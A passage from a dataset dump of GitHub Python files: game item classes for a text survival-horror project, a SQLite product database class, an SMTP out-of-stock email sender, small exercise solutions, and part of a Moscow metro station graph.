\"You equip the \" + self.name,True\n elif self.size == 2:\n player.mainHand = self\n player.offHand = self\n return \"You equip the \" + self.name,True\n\n def attack(self):\n pass\n \nclass RangedWeapon(Weapon):\n \n def __init__(self, name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, capacity, **kwargs):\n #required\n self.capacity = capacity\n\n #defaults\n self.ammoRemaining = capacity\n self.fireSound = None\n self.reloadSound = None\n self.emptySound = \"Sounds/Combat/EmptyGun.mp3\"\n self.rangeMod = [0,5,10,15]\n self.attackDesc = \"You open fire!\"\n\n super(RangedWeapon, self).__init__(name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs)\n #Me name es Wayne Purkle coz when I nommin' grapes day be PURKLE!!!\n def attack(self, enemy, player, attackType):\n if isinstance(enemy, Enemies.Enemy):\n sources = list()\n if attackType == \"heavy\":\n return \"You are not holding a melee weapon.\"\n \n if self.ammoRemaining <= 0:\n sources.append(pyglet.media.load(self.emptySound, streaming=False))\n #source.play()\n return \"You pull the trigger but nothing happens. Shit, it's empty...\", True, sources\n \n if self.fireSound:\n sources.append(pyglet.media.load(self.fireSound, streaming=False))\n #source.play()\n \n self.ammoRemaining -= 1\n hitChance = self.accuracy\n \n if enemy.distanceToPlayer == 1:\n hitChance -= self.rangeMod[0]\n elif enemy.distanceToPlayer == 2:\n hitChance -= self.rangeMod[1]\n elif enemy.distanceToPlayer == 3:\n hitChance -= self.rangeMod[2]\n \n if player.intoxication > 75:\n hitChance -= 25\n elif player.intoxication > 60:\n hitChance -= 15\n elif player.intoxication > 40:\n hitChance -= 10\n elif player.intoxication > 25:\n hitChance -= 5\n elif player.intoxication > 10:\n hitChance += 8\n elif player.intoxication > 1:\n hitChance += 5\n elif player.intoxication > 60:\n hitChance -= 5\n \n if enemy.stunnedTimer > 0:\n hitChance += 10\n else:\n hitChance -= enemy.rangedDodge\n \n if hitChance < 5:\n hitChance = 5\n \n attackRoll = randint(0, 100)\n if attackRoll <= hitChance:\n attackResult = enemy.takeHit(player, self, \"ranged\")\n try:\n resultString, enemySources = attackResult\n sources += enemySources\n except ValueError:\n resultString = attackResult\n else:\n resultString = self.attackDesc\n resultString += \"\\nYou miss!\"\n return resultString, True, sources\n else:\n return enemy.takeHit(player, self, attackType)\n\n def shoot(self, enemy, player):\n return self.attack(enemy, player, \"ranged\")\n \n def reload(self, player):\n sources = list()\n for item in player.inventory.itervalues():\n try:\n weaponType = item.weaponType\n except AttributeError:\n continue\n \n if self.name == weaponType:\n self.ammoRemaining = self.capacity\n item.destroy(player)\n if self.reloadSound:\n sources.append(pyglet.media.load(self.reloadSound, streaming=False))\n #source.play()\n\n return \"You reload the \" + self.name + \".\",True, sources\n \n return \"You don't have any ammo.\"\n \n def lookAt(self):\n resultString = self.description + \"\\n\"\n resultString += \"It has \" + str(self.ammoRemaining) + \" shots remaining.\"\n return resultString\n \nclass MeleeWeapon(Weapon):\n\n def __init__(self, name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs):\n #required\n\n #defaults\n self.stunLength = 2\n self.defenseBonus = 0\n self.stunChance = 20\n self.hitSound = None\n self.missSound = \"Sounds/Combat/MeleeMiss.mp3\"\n self.attackDesc = \"You swing your weapon!\"\n \n super(MeleeWeapon, self).__init__(name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs) \n\n def attack(self, enemy, player, attackType):\n if isinstance(enemy, Enemies.Enemy):\n sources = list()\n if enemy.distanceToPlayer > 1:\n return \"You are not within striking distance.\"\n\n hitChance = self.accuracy\n #print \"Initial hit chance: \" + str(hitChance)\n \n if player.intoxication > 75:\n hitChance -= 20\n elif player.intoxication > 60:\n hitChance -= 15\n elif player.intoxication > 40:\n hitChance -= 10\n elif player.intoxication > 25:\n hitChance -= 5\n elif player.intoxication > 10:\n hitChance += 8\n elif player.intoxication > 1:\n hitChance += 5\n \n if attackType == \"heavy\":\n hitChance -= 25\n #print \"Heavy attack penalty. New hit chance: \" + str(hitChance)\n \n if enemy.helpless:\n hitChance = 100\n elif enemy.stunnedTimer > 0:\n hitChance += 15\n #print \"Enemy stunned bonus. New hit chance: \" + str(hitChance)\n else:\n hitChance -= enemy.meleeDodge\n #print \"enemy dodge penalty. New hit chance: \" + str(hitChance)\n \n if hitChance < 10:\n hitChance = 10\n attackRoll = randint(0, 100)\n #print \"Final hit chance: \" + str(hitChance)\n #print \"Attack roll: \" + str(attackRoll)\n if attackRoll <= hitChance:\n if self.hitSound:\n sources.append(pyglet.media.load(self.hitSound, streaming=False))\n #source.play()\n attackResult = enemy.takeHit(player, self, attackType)\n try:\n resultString, enemySources = attackResult\n sources += enemySources\n except ValueError:\n resultString = attackResult\n else:\n resultString = self.attackDesc\n resultString += \"\\nYou miss!\"\n if self.missSound:\n sources.append(pyglet.media.load(self.missSound, streaming=False))\n #source.play()\n return resultString, True, sources\n else:\n return enemy.takeHit(player, self, attackType)\n\n def shoot(self, enemy, player):\n return \"Try as you might, you can't find a good way to use your \" + player.mainHand.name + \" as a gun.\"\n\nclass Ammo(Item):\n \n def __init__(self, name, description, seenDescription, keywords, weaponType, **kwargs):\n self.weaponType = weaponType\n super(Ammo, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \nclass Usable(Item):\n \n def __init__(self, name, description, seenDescription, keywords, useDescription, **kwargs):\n self.useDescription = useDescription\n super(Usable, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \nclass Drinkable(Usable):\n \n def __init__(self, name, description, seenDescription, keywords, useDescription, **kwargs):\n super(Drinkable, self).__init__(name, description, seenDescription, keywords, useDescription, **kwargs)\n \nclass Alchohol(Drinkable):\n \n def __init__(self, name, description, seenDescription, keywords, useDescription, alcoholAmount, **kwargs):\n self.alcoholAmount = alcoholAmount\n\n kwargs.update({\n \"useSound\":\"Sounds/Misc/LiquorDrink.mp3\"\n })\n\n super(Alchohol, self).__init__(name, description, seenDescription, keywords, useDescription, **kwargs)\n \n def drink(self, player):\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n\n sources = list()\n\n sources.append(pyglet.media.load(self.useSound, streaming=False))\n player.increaseIntox(self.alcoholAmount)\n spiritDecrease = self.alcoholAmount / 2\n if spiritDecrease > 10:\n spiritDecrease = 10\n decreaseCap = player.spirit - 49\n if decreaseCap <= 0:\n decreaseCap = 0\n if decreaseCap < spiritDecrease:\n spiritDecrease = decreaseCap\n player.decreaseSpirit(spiritDecrease)\n self.currentLocation.removeItem(self)\n\n return self.useDescription,True, sources\n \nclass Food(Usable):\n\n def __init__(self, name, description, seenDescription, keywords, useDescription, intoxReduction, **kwargs):\n self.intoxReduction = intoxReduction\n\n kwargs.update({\n \"useSound\":None\n })\n\n super(Food, self).__init__(name, description, seenDescription, keywords, useDescription, **kwargs)\n\n def eat(self, player):\n sources = list()\n #sources.append(pyglet.media.load(self.useSound, streaming=False))\n\n player.decreaseIntox(self.intoxReduction)\n self.currentLocation.removeItem(self)\n\n return self.useDescription, True, sources\n\nclass Readable(Item):\n \n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n super(Readable, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def read(self):\n pass\n\nclass Note(Readable):\n \n def __init__(self, name, description, seenDescription, keywords, contents, **kwargs):\n self.contents = contents\n\n kwargs.update({\n \"pickupSound\":[\"Sounds/Misc/PaperGet1.mp3\",\"Sounds/Misc/PaperGet2.mp3\",\"Sounds/Misc/PaperGet3.mp3\"]\n })\n super(Note, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def read(self, player):\n sources = list()\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n \n sources.append(pyglet.media.load(self.pickupSound[randint(0, len(self.pickupSound) - 1)], streaming=False))\n #source.play()\n\n return self.contents,True, sources\n\nclass Key(Item):\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n\n kwargs.update({\n \"pickupSound\":[\"Sounds/Misc/KeyGet.mp3\"]\n })\n\n super(Key, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def use(self, player):\n return \"Use the key on what?\"\n \n def useOn(self, player, recipient):\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n \n try:\n if recipient.isAccessible:\n return recipient.tryLock(self, player)\n else:\n return recipient.tryUnlock(self, player)\n except AttributeError:\n return \"It doesn't have a lock to put the key in...\"\n\nclass Corpse(Item):\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n self.itemsContained = {}\n super(Corpse, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def get(self, holder, player):\n return \"I've no desire to carry around a corpse.\"\n\n def wear(self, player):\n return \"Assuming you could even lift that, you doubt wearing a corpse will improve your fighting ability much.\"\n\n def equip(self, player):\n return \"Though the idea of beating a demon to death with a dead body is incredibly metal, it doesn't seem very practical.\"\n\n def addItem(self, itemToAdd):\n if itemToAdd.keywords in self.itemsContained:\n if itemToAdd.stackable:\n self.itemsContained[itemToAdd.keywords].quantity += itemToAdd.quantity\n else:\n self.itemsContained[itemToAdd.keywords].quantity += 1\n else:\n self.itemsContained[itemToAdd.keywords] = itemToAdd\n itemToAdd.currentLocation = self\n\n def removeItem(self, itemToRemove):\n if (self.itemsContained[itemToRemove.keywords].quantity > 1) and (not itemToRemove.stackable):\n self.itemsContained[itemToRemove.keywords].quantity -= 1\n else:\n del self.itemsContained[itemToRemove.keywords]\n itemToRemove.currentLocation = None\n\n def search(self, player):\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n\n itemsToRemove = []\n resultString = \"You look the body over.\"\n if self.itemsContained:\n for item in self.itemsContained.itervalues(): #Display all the visible items\n if item.firstSeen and item.initSeenDesc:\n resultString += \"\\n\" + item.initSeenDesc\n elif item.firstTaken and item.notTakenDesc:\n resultString += \"\\n\" + item.notTakenDesc\n else:\n resultString += \"\\n\" + item.seenDescription\n\n if item.quantity > 1:\n resultString += \" (\" + str(item.quantity) + \")\"\n item.firstSeen = False\n\n self.currentLocation.addItem(item)\n itemsToRemove.append(item.keywords)\n\n for keywords in itemsToRemove:\n del self.itemsContained[keywords]\n else:\n resultString += \"\\nYou don't find anything of interest.\"\n\n return resultString, True","repo_name":"ThomasProtheroe/TextSurvivalHorror","sub_path":"Main/Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":22276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22223876551","text":"import sqlite3 #import the sqlite3 module to be used.\nimport traceback\n\nclass Banco():\n def __init__(self):\n self.conn = sqlite3.connect(\"meubanco.db\")\n\n def __del__(self):\n self.conn.close()\n\n def select(self, sqlstatement):\n \"\"\"Seleciona registros do banco de dados a partir de um parâmetro\"\"\"\n self.__cursor = self.conn.cursor()\n\n try:\n self.__cursor.execute(sqlstatement)\n \n except sqlite3.OperationalError:\n print (\"Erro. Verifique seu SQL\")\n\n self.dados = self.__cursor.fetchall()\n\n def select_one(self, id):\n self.__cursor = self.conn.cursor()\n\n sqlstatement = \"Select * from produto where id=?\"\n\n try:\n self.__cursor.execute(sqlstatement,id)\n except sqlite3.OperationalError:\n print (\"Erro. Verifique seu SQL\")\n\n self.dados = self.__cursor.fetchall()\n\n\n def create(self):\n self.__cursor = self.conn.cursor()\n try:\n sqlstatement = \"drop table if exists produto\"\n self.__cursor.execute(sqlstatement)\n sqlstatement = \"CREATE TABLE produto (id INTEGER PRIMARY KEY AUTOINCREMENT, Nome_do_Produto TEXT (255), Quantidade TEXT (10), Valor TEXT (10) );\"\n self.__cursor.execute(sqlstatement) \n \n except sqlite3.OperationalError:\n #print Exception.\n print (\"Erro. Verifique seu SQL\")\n\n self.conn.commit()\n\n\n def insert(self,dados):\n self.__cursor = self.conn.cursor()\n sqlstatement = \"INSERT INTO produto (Nome_do_Produto, Quantidade, Valor) VALUES (?,?,?)\"\n try:\n self.__cursor.execute(sqlstatement, dados)\n\n except sqlite3.OperationalError:\n print (\"Erro. Verifique seu SQL\")\n\n self.conn.commit()\n\n def update(self,dados):\n self.__cursor = self.conn.cursor()\n sqlstatement = \"\"\"UPDATE produto \n SET Nome_do_Produto=?, Quantidade=?, Valor=? \n WHERE id=?\n \"\"\"\n\n try:\n self.__cursor.execute(sqlstatement, dados)\n\n except sqlite3.Error as er:\n print('SQLite error: %s' % (' '.join(er.args)))\n print(\"Exception class is: \", er.__class__)\n print('SQLite traceback: ')\n exc_type, exc_value, exc_tb = sys.exc_info()\n print(traceback.format_exception(exc_type, exc_value, exc_tb))\n\n self.conn.commit()\n\n\n def delete(self,id):\n self.__cursor = self.conn.cursor()\n sqlstatement = \"DELETE FROM produto where ID=?\"\n try:\n self.__cursor.execute(sqlstatement, id)\n\n except sqlite3.OperationalError:\n print (\"Erro. Verifique seu SQL\")\n\n self.conn.commit()","repo_name":"jonasgueiros/projetos","sub_path":"uemg/atv4POO2/banco.py","file_name":"banco.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74476392694","text":"import smtplib\nimport json\nfrom email.mime.text import MIMEText\n\n\ndef send_email(recipient_email, subject, out_of_stock_items):\n \"\"\"Sends user email of a table for all out of stock items\"\"\"\n with open('creds.json', 'r') as file:\n creds = json.load(file)\n smtp_creds = creds['aws_smtp']\n smtp_server = smtp_creds['server']\n smtp_port = smtp_creds['port']\n smtp_username = smtp_creds['username']\n smtp_password = smtp_creds['password']\n\n html_content = \"\"\"\n \n \n \n \n \n

Out of Stock Products

\n \n \n \n \n \n \n \n \n \"\"\"\n for item in out_of_stock_items:\n sku = item.get('SKU', '-')\n product_name = item.get('Product Name', '-')\n cost_price = item.get('Cost Price', '-')\n rrp = item.get('RRP', '-')\n stock = item.get('Stock', '-')\n html_content += (\n f\"\"\n f\"\"\n )\n\n html_content += \"\"\"\n
SKUProduct NameCost PriceRRPStock
{sku}{product_name}{cost_price}{rrp}{stock}
\n \n \n \"\"\"\n\n msg = MIMEText(html_content, 'html')\n msg['Subject'] = subject\n msg['From'] = 'orders@tackletarts.uk'\n msg['To'] = recipient_email\n\n with smtplib.SMTP(smtp_server, smtp_port) as smtp_connection:\n smtp_connection.starttls()\n smtp_connection.login(smtp_username, smtp_password)\n smtp_connection.sendmail(msg['From'], [msg['To']], msg.as_string())\n","repo_name":"ouzifeng/CI_PP3_FISHING_TACKLE_MANAGEMENT_APPLICATION","sub_path":"email_service.py","file_name":"email_service.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29496614446","text":"class Solution:\n def putMarbles(self, weights: List[int], k: int) -> int:\n n=len(weights)-1\n res=[0]*n\n for i in range(len(res)):\n res[i]=weights[i]+weights[i+1]\n res.sort()\n ans=0\n for i in range(k-1):\n ans+=res[n-1-i]-res[i]\n return ans","repo_name":"shivang257/LeetCode-Daily-Practice-Problem-Solutions","sub_path":"2551-put-marbles-in-bags/2551-put-marbles-in-bags.py","file_name":"2551-put-marbles-in-bags.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"1664569790","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nvehicle = pd.read_csv(r'D:\\迅雷下载\\vehicles.csv.zip')\n\nmask = vehicle.make.isin(\n [\"Ford\", \"Honda\", \"Tesla\", \"BMW\"]\n)\nprint(\n vehicle[mask].groupby('make').city08.agg(['mean','std'])\n .style.background_gradient(cmap=\"RdBu\", axis=0)\n)\nvehicle[mask].groupby('make').city08.agg(['mean', 'std']).style.background_gradient(cmap=\"RdBu\", axis=0)","repo_name":"DRAGONINWAVE/for_little_sun","sub_path":"《pandas_1.x_cookbook》/Chapter_4_Explotary_Data_Analysis/cool_style_background_gradient.py","file_name":"cool_style_background_gradient.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"11787187745","text":"from os import popen\nfrom multiprocess import pool\n\nimport time\n\n\ndef test(i):\n print(i)\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n lists = [i for i in range(1, 100)]\n pool = pool.Pool(processes=100) # 最大任务数\n pool.map(test, lists) # 参数是迭代类型\n pool.close() # 关闭池子开始运行\n pool.join() # 阻塞当前线程,直到返回\n","repo_name":"junknet/tcp-ip_notes","sub_path":"src/python/multiproces.py","file_name":"multiproces.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21842453297","text":"# Given two numbers, hour and minutes.\n# Return the smaller angle (in degrees) formed between the hour and the minute hand.\n\nclass Solution:\n def angleClock(self, hour: int, minutes: int) -> float:\n '''\n ideas:\n 360 degrees divided into 6 per min, 30 per hour\n find the minute position of the hour hand\n 12:30 = (6-0.5)*30 = 165\n 3:30 = (6-3.5)*30 = 75\n 3:15 = abs(3.25-3)*30 = 7.5\n 4:50 = abs(4+50/60-50/5)*30 = 155\n 12:00 = abs(12%12 + 0/60 - 0/5)*30 = 0\n\n 12:45 = 112.5\n '''\n return min(abs(hour % 12 + minutes / 60 - minutes / 5)*30, \\\n 360 - abs(hour % 12 + minutes / 60 - minutes / 5)*30)\n\nh = 12\nm = 46\nsol = Solution()\nprint(sol.angleClock(h,m))\n","repo_name":"JieFrye/leetcode","sub_path":"Math/AngleBetweenHandsofaClock.py","file_name":"AngleBetweenHandsofaClock.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5100732663","text":"def marks_calculate():\r\n while True:\r\n sh = float(input(\"Enter the number of hours you study\"))\r\n rank = input(\"How good are you at studying (low/below avg/avg/above avg/high)\")\r\n if (rank == \"low\"):\r\n marks = sh*10 - 10\r\n elif (rank == \"below avg\"):\r\n marks = sh*10 - 5\r\n elif (rank == \"avg\"):\r\n marks = sh*10\r\n elif (rank == \"above avg\"):\r\n if (sh <= 9.5):\r\n marks = sh*10 + 5\r\n else :\r\n marks = 100\r\n elif (rank == \"high\"):\r\n if (sh <= 9):\r\n marks = sh*10 + 10\r\n else :\r\n marks = 100\r\n else :\r\n print(\"the key enetered is not valid, please try again\")\r\n print(\"Your estimated marks is :\",marks)\r\n ans=input(\"Do you want to try again (yes/no)\")\r\n if (ans==\"yes\"):\r\n continue\r\n else:\r\n print(\"Thank You\")\r\n break\r\n\r\nmarks_calculate()\r\n \r\n","repo_name":"ParshantR/Marks-Calculators-","sub_path":"Parshant Ratawal GRIP task.py","file_name":"Parshant Ratawal GRIP task.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20546180042","text":"import re\r\n\r\nmetroTMP = {'Новоясеневская6' : [('Ясенево6',), 1000, '', False],\r\n 'Ясенево6' : [('Новоясеневская6', 'Теплый стан6'), 1000, '', False],\r\n 'Теплый стан6' : [('Ясенево6', 'Коньково6'), 1000, '', False],\r\n 'Коньково6': [('Теплый стан6', 'Беляево6'), 1000, '', False],\r\n 'Беляево6': [('Коньково6', 'Калужская6'), 1000, '', False],\r\n 'Калужская6': [('Беляево6', 'Новые черемушки6'), 1000, '', False],\r\n 'Новые черемушки6': [('Калужская6', 'Профсоюзная6'), 1000, '', False],\r\n 'Профсоюзная6': [('Новые черемушки6', 'Академическая6'), 1000, '', False],\r\n 'Академическая6': [('Профсоюзная6', 'Ленинский проспект6'), 1000, '', False],\r\n 'Ленинский проспект6': [('Академическая6', 'Шаболовская6'), 1000, '', False],\r\n 'Шаболовская6': [('Ленинский проспект6', 'Октябрьская6'), 1000, '', False],\r\n 'Октябрьская6': [('Октябрьская5', 'Третьяковская6', 'Шаболовская6'), 1000, '', False],\r\n 'Третьяковская6': [('Октябрьская6', 'Китай-город6', 'Новокузнецкая2', 'Третьяковская8'), 1000, '', False],\r\n 'Китай-город6': [('Третьяковская6', 'Тургеневская6', 'Китай-город7'), 1000, '', False],\r\n 'Тургеневская6': [('Китай-город6', 'Сухаревская6', 'Чистые пруды1', 'Сретенский бульвар10'), 1000, '', False],\r\n 'Сухаревская6': [('Тургеневская6', 'Проспект мира6'), 1000, '', False],\r\n 'Проспект мира6': [('Проспект мира5', 'Сухаревская6', 'Рижская6'), 1000, '', False],\r\n 'Рижская6': [('Проспект мира6', 'Алексеевская6'), 1000, '', False],\r\n 'Алексеевская6': [('Рижская6', 'ВДНХ6'), 1000, '', False],\r\n 'ВДНХ6': [('Алексеевская6', 'Ботанический сад6'), 1000, '', False],\r\n 'Ботанический сад6': [('ВДНХ6', 'Свиблово6'), 1000, '', False],\r\n 'Свиблово6': [('Ботанический сад6', 'Бабушкинская6'), 1000, '', False],\r\n 'Бабушкинская6': [('Свиблово6', 'Медведково6'), 1000, '', False],\r\n 'Медведково6': [('Бабушкинская6',), 1000, '', False],\r\n 'Бульвар Дмитрия Донского9' : [('Аннино9',), 1000, '', False],\r\n 'Аннино9' : [('Бульвар Дмитрия Донского9', 'Улица академика Янгеля9'), 1000, '', False],\r\n 'Улица академика Янгеля9' : [('Аннино9', 'Пражская9'), 1000, '', False],\r\n 'Пражская9': [('Улица академика Янгеля9', 'Южная9'), 1000, '', False],\r\n 'Южная9': [('Пражская9', 'Чертановская9'), 1000, '', False],\r\n 'Чертановская9': [('Южная9', 'Севастопольская9'), 1000, '', False],\r\n 'Севастопольская9': [('Чертановская9', 'Нахимовский проспект9', 'Каховская11'), 1000, '', False],\r\n 'Нахимовский проспект9': [('Севастопольская9', 'Нагорная9'), 1000, '', False],\r\n 'Нагорная9': [('Нахимовский проспект9', 'Нагатинская9'), 1000, '', False],\r\n 'Нагатинская9': [('Нагорная9', 'Тульская9'), 1000, '', False],\r\n 'Тульская9': [('Нагатинская9', 'Серпуховская9'), 1000, '', False],\r\n 'Серпуховская9': [('Тульская9', 'Полянка9', 'Добрынинская5'), 1000, '', False],\r\n 'Полянка9': [('Серпуховская9', 'Боровицкая9'), 1000, '', False],\r\n 'Боровицкая9': [('Полянка9', 'Чеховская9', 'Библиотека имени Ленина1', 'Арбатская3', 'Александровский сад4'), 1000, '', False],\r\n 'Чеховская9': [('Боровицкая9', 'Цветной бульвар9', 'Тверская2', 'Пушкинская7'), 1000, '', False],\r\n 'Цветной бульвар9': [('Чеховская9', 'Менделеевская9', 'Трубная10'), 1000, '', False],\r\n 'Менделеевская9': [('Савеловская9', 'Цветной бульвар9'), 1000, '', False],\r\n 'Савеловская9': [('Менделеевская9', 'Дмитровская9'), 1000, '', False],\r\n 'Дмитровская9': [('Савеловская9', 'Тимирязевская9'), 1000, '', False],\r\n 'Тимирязевская9': [('Дмитровская9', 'Петровско-Разумовская9'), 1000, '', False],\r\n 'Петровско-Разумовская9': [('Тимирязевская9', 'Владыкино9'), 1000, '', False],\r\n 'Владыкино9': [('Петровско-Разумовская9', 'Отрадное9'), 1000, '', False],\r\n 'Отрадное9': [('Владыкино9', 'Бибирево9'), 1000, '', False],\r\n 'Бибирево9': [('Отрадное9', 'Алтуфьево9'), 1000, '', False],\r\n 'Алтуфьево9': [('Бибирево9',), 1000, '', False],\r\n 'Октябрьская5': [('Парк культуры5', 'Добрынинская5', 'Октябрьская6'), 1000, '', False],\r\n 'Парк культуры5' : [('Октябрьская5', 'Киевская5', 'Парк культуры1'), 1000, '', False],\r\n 'Киевская5': [('Парк культуры5', 'Краснопресненская5', 'Киевская3', 'Киевская4'), 1000, '', False],\r\n 'Краснопресненская5': [('Белорусская5', 'Киевская5'), 1000, '', False],\r\n 'Белорусская5': [('Краснопресненская5', 'Новослободская5', 'Белорусская2'), 1000, '', False],\r\n 'Новослободская5': [('Белорусская5', 'Проспект мира5', 'Менделеевская9'), 1000, '', False],\r\n 'Проспект мира5': [('Новослободская5', 'Комсомольская5', 'Проспект мира6'), 1000, '', False],\r\n 'Комсомольская5': [('Проспект мира5', 'Курская5', 'Комсомольская1'), 1000, '', False],\r\n 'Курская5': [('Комсомольская5', 'Таганская5', 'Курская3', 'Чкаловская10'), 1000, '', False],\r\n 'Таганская5': [('Курская5', 'Павелецкая5', 'Таганская7'), 1000, '', False],\r\n 'Добрынинская5': [('Октябрьская5', 'Павелецкая5','Серпуховская9'), 1000, '', False],\r\n 'Павелецкая5': [('Таганская5', 'Добрынинская5', 'Павелецкая2'), 1000, '', False],\r\n 'Саларьево1': [('Румянцево1',), 1000, '', False],\r\n 'Румянцево1': [('Саларьево1', 'Тропарево1'), 1000, '', False],\r\n 'Тропарево1': [('Румянцево1', 'Юго-Западная1'), 1000, '', False],\r\n 'Юго-Западная1': [('Тропарево1', 'Проспект Вернадского1'), 1000, '', False],\r\n 'Проспект Вернадского1': [('Юго-Западная1', 'Университет1'), 1000, '', False],\r\n 'Университет1': [('Проспект Вернадского1', 'Воробьевы горы1'), 1000, '', False],\r\n 'Воробьевы горы1': [('Университет1', 'Спортивная1'), 1000, '', False],\r\n 'Спортивная1': [('Воробьевы горы1', 'Фрунзенская1'), 1000, '', False],\r\n 'Фрунзенская1': [('Спортивная1', 'Парк культуры1'), 1000, '', False],\r\n 'Парк культуры1': [('Фрунзенская1', 'Кропоткинская1', 'Парк культуры5'), 1000, '', False],\r\n 'Кропоткинская1': [('Библиотека имени Ленина1', 'Парк культуры1'), 1000, '', False],\r\n 'Библиотека имени Ленина1': [('Кропоткинская1', 'Охотный ряд1', 'Боровицкая9', 'Арбатская3', 'Александровский сад4'), 1000, '', False],\r\n 'Охотный ряд1': [('Библиотека имени Ленина1', 'Лубянка1', 'Театральная2', 'Площадь революции3'), 1000, '', False],\r\n 'Лубянка1': [('Охотный ряд1', 'Чистые пруды1', 'Кузнецкий мост7'), 1000, '', False],\r\n 'Чистые пруды1': [('Лубянка1', 'Красные ворота1'), 1000, '', False],\r\n 'Красные ворота1': [('Чистые пруды1', 'Комсомольская1'), 1000, '', False],\r\n 'Комсомольская1': [('Красные ворота1', 'Комсомольская5', 'Красносельская1'), 1000, '', False],\r\n 'Красносельская1': [('Комсомольская1', 'Сокольники1'), 1000, '', False],\r\n 'Сокольники1': [('Красносельская1', 'Преображенская площадь1'), 1000, '', False],\r\n 'Преображенская площадь1': [('Сокольники1', 'Черкизовская1'), 1000, '', False],\r\n 'Черкизовская1': [('Преображенская площадь1', 'Бульвар Рокоссовского1'), 1000, '', False],\r\n 'Бульвар Рокоссовского1': [('Черкизовская1',), 1000, '', False],\r\n 'Алма-Атинская2': [('Красногвардейская2',), 1000, '', False],\r\n 'Красногвардейская2': [('Алма-Атинская2','Домодедовская2'), 1000, '', False],\r\n 'Домодедовская2': [('Красногвардейская2', 'Орехово2'), 1000, '', False],\r\n 'Орехово2': [('Домодедовская2', 'Царицыно2'), 1000, '', False],\r\n 'Царицыно2': [('Орехово2', 'Кантемировская2'), 1000, '', False],\r\n 'Кантемировская2': [('Царицыно2', 'Каширская2'), 1000, '', False],\r\n 'Каширская2': [('Кантемировская2', 'Коломенская2', 'Каширская11'), 1000, '', False],\r\n 'Коломенская2': [('Каширская2', 'Автозаводская2'), 1000, '', False],\r\n 'Автозаводская2': [('Коломенская2', 'Павелецкая2'), 1000, '', False],\r\n 'Павелецкая2': [('Автозаводская2', 'Новокузнецкая2', 'Павелецкая5'), 1000, '', False],\r\n 'Новокузнецкая2': [('Павелецкая2', 'Театральная2', 'Третьяковская6', 'Третьяковская8'), 1000, '', False],\r\n 'Театральная2': [('Новокузнецкая2', 'Тверская2', 'Охотный ряд1', 'Площадь революции3'), 1000, '', False],\r\n 'Тверская2': [('Театральная2', 'Маяковская2', 'Чеховская9', 'Пушкинская7'), 1000, '', False],\r\n 'Маяковская2': [('Тверская2', 'Белорусская2'), 1000, '', False],\r\n 'Белорусская2': [('Маяковская2', 'Динамо2', 'Белорусская5'), 1000, '', False],\r\n 'Динамо2': [('Белорусская2', 'Аэропорт2'), 1000, '', False],\r\n 'Аэропорт2': [('Динамо2', 'Сокол2'), 1000, '', False],\r\n 'Сокол2': [('Аэропорт2', 'Войковская2'), 1000, '', False],\r\n 'Войковская2': [('Сокол2', 'Водный стадион2'), 1000, '', False],\r\n 'Водный стадион2': [('Войковская2', 'Речной вокзал2'), 1000, '', False],\r\n 'Речной вокзал2': [('Водный стадион2',), 1000, '', False],\r\n 'Зябликово10': [('Шипиловская10',), 1000, '', False],\r\n 'Шипиловская10': [('Зябликово10','Борисово10'), 1000, '', False],\r\n 'Борисово10': [('Шипиловская10', 'Марьино10'), 1000, '', False],\r\n 'Марьино10': [('Борисово10', 'Братиславская10'), 1000, '', False],\r\n 'Братиславская10': [('Марьино10', 'Люблино10'), 1000, '', False],\r\n 'Люблино10': [('Братиславская10', 'Волжская10'), 1000, '', False],\r\n 'Волжская10': [('Люблино10', 'Печатники10'), 1000, '', False],\r\n 'Печатники10': [('Волжская10', 'Кожуховская10'), 1000, '', False],\r\n 'Кожуховская10': [('Печатники10', 'Дубровка10'), 1000, '', False],\r\n 'Дубровка10': [('Кожуховская10', 'Крестьянская застава10'), 1000, '', False],\r\n 'Крестьянская 